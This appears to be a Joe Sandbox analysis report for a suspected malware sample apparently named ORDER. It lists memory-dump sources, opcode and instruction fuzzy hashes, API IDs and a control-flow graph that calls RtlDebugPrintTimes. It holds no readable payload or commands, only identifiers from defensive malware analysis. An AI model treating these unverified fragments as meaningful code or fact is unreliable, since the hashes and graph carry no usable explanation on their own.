                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                          • Instruction ID: 9ac32e9233a429e429d28462745076c4bf42552bf54699f1db5d50a58107b710
                          • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                          • Instruction Fuzzy Hash: 0FE065B2210240BBE725DB58CD01FE677ACEB84B24F540258B125921D0EEF4FE40CAA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6624c9070346a8715683955eb4c7de176401e57b86885851d1708e87576d3188
                          • Instruction ID: bdd9e8d41d55db4bce8a03447e1c45d0b78d565b6557671b48b78132a6d6b7de
                          • Opcode Fuzzy Hash: 6624c9070346a8715683955eb4c7de176401e57b86885851d1708e87576d3188
                          • Instruction Fuzzy Hash: 4DE09232102A54ABC721EB29DC11F9A7B99EB54364F004518F116571A1CBB4AD50C7D4
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac7c584822953886a024a6d7f531a89d3c4335e185ffb9ea20263c4af986c53d
                          • Instruction ID: d7517d4423893a63e195be878e6bec2be3d6a324dde2a117341d2d5620f3721c
                          • Opcode Fuzzy Hash: ac7c584822953886a024a6d7f531a89d3c4335e185ffb9ea20263c4af986c53d
                          • Instruction Fuzzy Hash: DEE08C32041610EFF7365A24EC00F817AA5AF04B50F20046EE0860A1A18BFEA8C2DA88
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                          • Instruction ID: f3687c2d3cac5fac3ae62a921745c721e328bf908e5318e70b68a3537806e43c
                          • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                          • Instruction Fuzzy Hash: 3BD05E32051620AAC7322F10ED05F927AB5AF44F18F15052CB141165F19AE5ED94CA90
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                          • Instruction ID: d4c91794925e6f0b3958fede094c80518372171ed212b885895e09d6ea310cf2
                          • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                          • Instruction Fuzzy Hash: 68D0C932255650ABD772AA1CFC00FC377E9AB88B61F160459B529C7152D7A9EC81CA84
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                          • Instruction ID: 0feb381f794103c9de99af6d1a7bc5c3d407ef1b5e1dc6b92bedb899b1d40f4b
                          • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                          • Instruction Fuzzy Hash: E1D0123620717097DB296A556914F977D599B89B94F1A006D790993900C9149C83DBE0
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                          • Instruction ID: b73757a8c0bd5bc48b31c517a4c7f11085e1dcccb025ef3451f8076617fd1244
                          • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                          • Instruction Fuzzy Hash: 31D012371D054CBBCB129F65DC01F957FA9E794B60F044020B614875A1DA7AE960D584
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                          • Instruction ID: 6b0f32164bf08dff50745bc365800f9ba31acf1b427c5122267b54d9897ad242
                          • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                          • Instruction Fuzzy Hash: B6D0C939312D80CFD647CB0CC890B0533A4BB44B84FC10490E801CB762D63DD940CA00
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                          • Instruction ID: 26db6bc91603a2b37c2472e732f4394501e3203cc1b1108f8726fd1cb88c5d79
                          • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                          • Instruction Fuzzy Hash: 2DC01232290648AFC722AA98CD01F427BA9EB98B00F040021F3048B671D675E820EA88
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                          • Instruction ID: 81217f59a51f3c264c99e4a7c5d2799989bc1b2709ad9119325d2f9cae139553
                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                          • Instruction Fuzzy Hash: C6D0123610024CEFCB05DF40C850D6A772AFFC8710F109019FD190B6508A71ED62DA50
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                          • Instruction ID: e01154713cc58205c69d5cd6f948eb3ca61f7c73b0b5ca06acfbaf3bc1a9cd13
                          • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                          • Instruction Fuzzy Hash: DFC08CB81422806AFB1B5B40C912B283E58AB54F4DFE4019CAA101D5A2EFEED8118208
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                          • Instruction ID: c995e818f12736e25e4d36df19a3bc3a5419e4d20680f759626555753b7b3f5d
                          • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                          • Instruction Fuzzy Hash: 2EC04C397415408FDF06CB19C284F4977E4BB44740F1504D0ED15CB721E664EC50CA50
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e98d10e8916d48cbf3d660b47ea1b89c5e46d984217297ba0bd1213d97142c2
                          • Instruction ID: 0e07e87128dd7a77a79d4a494250760020bbc60fae1118b9c3ec146be1708c70
                          • Opcode Fuzzy Hash: 1e98d10e8916d48cbf3d660b47ea1b89c5e46d984217297ba0bd1213d97142c2
                          • Instruction Fuzzy Hash: DE900231605400129640715C5A8458640055BE1301B52C416E0715514CDA24895A7361
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18c16bc991c1c0436e1ee2d79c5f6e4f2ffa24d3c4372ad2066aa635f30f89b4
                          • Instruction ID: 1e06b7f5a32825817ef5e3e9c80eef0054c2a85c216273f28186dc6dae7d2e37
                          • Opcode Fuzzy Hash: 18c16bc991c1c0436e1ee2d79c5f6e4f2ffa24d3c4372ad2066aa635f30f89b4
                          • Instruction Fuzzy Hash: 8E900271601100424640715C5A0444660055BE2301392C51AA0745520CD6288859B269
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa4d8e7a0276d3d715ae178e953081561e03e320cc353858032a0fb53d5de091
                          • Instruction ID: 2201ccd9c64134b5774b5fa94698a2fe1c8709e582458a6156cca5e27d8a0aed
                          • Opcode Fuzzy Hash: aa4d8e7a0276d3d715ae178e953081561e03e320cc353858032a0fb53d5de091
                          • Instruction Fuzzy Hash: 75900235221000020645A55C170454B04455BD7351392C41AF1707550CD63188697321
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdd4180aa83c3eca33aa190eb29199bcb269fb1947c513497ce88aa95de1ff50
                          • Instruction ID: 85c4ed6dc0e5468aafa9ca42faffcda34cd38c31e60caca8d234bba9bdc65b45
                          • Opcode Fuzzy Hash: fdd4180aa83c3eca33aa190eb29199bcb269fb1947c513497ce88aa95de1ff50
                          • Instruction Fuzzy Hash: D790023160500802D650715C561478600054BD1301F52C416A0315614DD7658A5976A1
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94f7a4f13521ccabb074eadd02961f3849561cd2379b48535d56db0766d0a3d8
                          • Instruction ID: 1f386e82639b9f0cbeb88496ae0398a909107f17af2892e1ef072ad7fa2c5485
                          • Opcode Fuzzy Hash: 94f7a4f13521ccabb074eadd02961f3849561cd2379b48535d56db0766d0a3d8
                          • Instruction Fuzzy Hash: 7490023120100802D604615C5A046C600054BD1301F52C416A6315615EE67588957131
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36e1f83e3e125de865e361c291909cfb846f74b5e30546f5afa21bf1d5bc0523
                          • Instruction ID: 33a428528f664786afc3febd9e511e3f37c70ec2969fcc13425ceb72f5452527
                          • Opcode Fuzzy Hash: 36e1f83e3e125de865e361c291909cfb846f74b5e30546f5afa21bf1d5bc0523
                          • Instruction Fuzzy Hash: 7B90023120504842D640715C5604A8600154BD1305F52C416A0355654DE6358D59B661
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c129fe17096f03aee16f038a5513b8729aa205db4d3dc35eb17f5e145c61a47f
                          • Instruction ID: 82bc60e539a339fdf4225e4051f6c345271280cb49c90291d59a803b177b9039
                          • Opcode Fuzzy Hash: c129fe17096f03aee16f038a5513b8729aa205db4d3dc35eb17f5e145c61a47f
                          • Instruction Fuzzy Hash: 4C90023120100802D680715C560468A00054BD2301F92C41AA0316614DDA258A5D77A1
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cd2695297737be9b1f61a9e2c8fc582640c9e157b4323f3dd5f16ac0e136384
                          • Instruction ID: 6b52e9e9c72e10933fea14dab2a0b626fa5d72e43f544bb09f8f23784c804484
                          • Opcode Fuzzy Hash: 4cd2695297737be9b1f61a9e2c8fc582640c9e157b4323f3dd5f16ac0e136384
                          • Instruction Fuzzy Hash: CC90023160500402D640715C661874600154BD1201F52D416A0315514DD6698A5976A1
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69eff54cc0090cf4990111c36be46a09fe311b6e63167ffba877f59e2839cdf4
                          • Instruction ID: 63a17006ede981de3c740508f31cc66bfb56ef349e554620a3b064048c32fd47
                          • Opcode Fuzzy Hash: 69eff54cc0090cf4990111c36be46a09fe311b6e63167ffba877f59e2839cdf4
                          • Instruction Fuzzy Hash: 9C90023120100842D600615C5604B8600054BE1301F52C41BA0315614DD625C8557521
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 469a061e5dd6e2a0501aea723b3030173a46e589d5f97217aa61a463058d1522
                          • Instruction ID: 7ca1c939fc161e6ba76c30df77d13dc1316a1d941d1f8bf3ae04ba61b578cb1b
                          • Opcode Fuzzy Hash: 469a061e5dd6e2a0501aea723b3030173a46e589d5f97217aa61a463058d1522
                          • Instruction Fuzzy Hash: 2E90023124505102D650715C560465640056BE1201F52C426A0B05554DD56588597221
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2f482fc6bd614a9816ac3ca084f0fe2dc5f10607ced367855a6d7e66a5939c7
                          • Instruction ID: 5c8a2350151a8bb1c9898b4bf86ce57a7c8039a1cdecaccc47a81dd00bd8e915
                          • Opcode Fuzzy Hash: f2f482fc6bd614a9816ac3ca084f0fe2dc5f10607ced367855a6d7e66a5939c7
                          • Instruction Fuzzy Hash: 189002B1201140924A00A25C9604B4A45054BE1201B52C41BE1345520CD5358855B135
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0048d20b58e60f926953ea3c9e6970575479993d8dc9be8f4520a79db842b02e
                          • Instruction ID: 9c0c5b55a087170557b5107ba52b4f1e06cee783748201110b40da6284fc34d0
                          • Opcode Fuzzy Hash: 0048d20b58e60f926953ea3c9e6970575479993d8dc9be8f4520a79db842b02e
                          • Instruction Fuzzy Hash: 86900235211000030605A55C170454700464BD6351352C426F1306510CE63188657121
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ed2ae5ec58fdbb9da42dcd192bae60f1ae7ea36981c3409ab9a806619dbc957
                          • Instruction ID: 348ced07dd4362ea31a37381ac175739067dfd145c7e4dbc5d6d0c9a818a8b79
                          • Opcode Fuzzy Hash: 7ed2ae5ec58fdbb9da42dcd192bae60f1ae7ea36981c3409ab9a806619dbc957
                          • Instruction Fuzzy Hash: 7290027134100442D600615C5614B4600058BE2301F52C41AE1355514DD629CC567126
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                          • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                          • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                          • Instruction Fuzzy Hash:

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 510 324fa1f0-324fa269 call 32432330 * 2 RtlDebugPrintTimes 516 324fa41f-324fa444 call 324324d0 * 2 call 32464b50 510->516 517 324fa26f-324fa27a 510->517 519 324fa27c-324fa289 517->519 520 324fa2a4 517->520 523 324fa28f-324fa295 519->523 524 324fa28b-324fa28d 519->524 521 324fa2a8-324fa2b4 520->521 527 324fa2c1-324fa2c3 521->527 525 324fa29b-324fa2a2 523->525 526 324fa373-324fa375 523->526 524->523 525->521 530 324fa39f-324fa3a1 526->530 531 324fa2b6-324fa2bc 527->531 532 324fa2c5-324fa2c7 527->532 536 324fa3a7-324fa3b4 530->536 537 324fa2d5-324fa2fd RtlDebugPrintTimes 530->537 534 324fa2be 531->534 535 324fa2cc-324fa2d0 531->535 532->530 534->527 539 324fa3ec-324fa3ee 535->539 540 324fa3da-324fa3e6 536->540 541 324fa3b6-324fa3c3 536->541 537->516 550 324fa303-324fa320 RtlDebugPrintTimes 537->550 539->530 542 324fa3fb-324fa3fd 540->542 544 324fa3cb-324fa3d1 541->544 545 324fa3c5-324fa3c9 541->545 548 324fa3ff-324fa401 542->548 549 324fa3f0-324fa3f6 542->549 546 324fa4eb-324fa4ed 544->546 547 324fa3d7 544->547 545->544 551 324fa403-324fa409 546->551 547->540 548->551 552 324fa3f8 549->552 553 324fa447-324fa44b 549->553 550->516 558 324fa326-324fa34c RtlDebugPrintTimes 550->558 555 324fa40b-324fa41d RtlDebugPrintTimes 551->555 556 324fa450-324fa474 RtlDebugPrintTimes 551->556 552->542 554 324fa51f-324fa521 553->554 555->516 556->516 562 324fa476-324fa493 RtlDebugPrintTimes 556->562 558->516 563 324fa352-324fa354 558->563 562->516 570 324fa495-324fa4c4 RtlDebugPrintTimes 562->570 564 324fa377-324fa38a 563->564 565 324fa356-324fa363 563->565 569 324fa397-324fa399 564->569 567 324fa36b-324fa371 565->567 568 324fa365-324fa369 565->568 567->526 567->564 568->567 571 324fa38c-324fa392 569->571 572 324fa39b-324fa39d 569->572 570->516 576 324fa4ca-324fa4cc 570->576 573 324fa3e8-324fa3ea 571->573 574 324fa394 571->574 572->530 573->539 574->569 577 324fa4ce-324fa4db 576->577 578 324fa4f2-324fa505 576->578 580 324fa4dd-324fa4e1 577->580 581 324fa4e3-324fa4e9 577->581 579 324fa512-324fa514 578->579 582 324fa507-324fa50d 579->582 583 324fa516 579->583 580->581 581->546 581->578 584 324fa50f 582->584 585 324fa51b-324fa51d 582->585 583->548 584->579 585->554
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: HEAP:
                          • API String ID: 3446177414-2466845122
                          • Opcode ID: f2ed7eb36f2564d00ac6bd7178f2331c11438db704c0d307d76f4bd53e59ff9e
                          • Instruction ID: 70309f3f94ed14dbcd9a2c7b069191934bc4b22730502d3ebad162ffa26ef2a0
                          • Opcode Fuzzy Hash: f2ed7eb36f2564d00ac6bd7178f2331c11438db704c0d307d76f4bd53e59ff9e
                          • Instruction Fuzzy Hash: 80A1C9756043229FD705CF28C894A1AB7E5FBC8B54F04492DEA46DB350EB72EC86CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
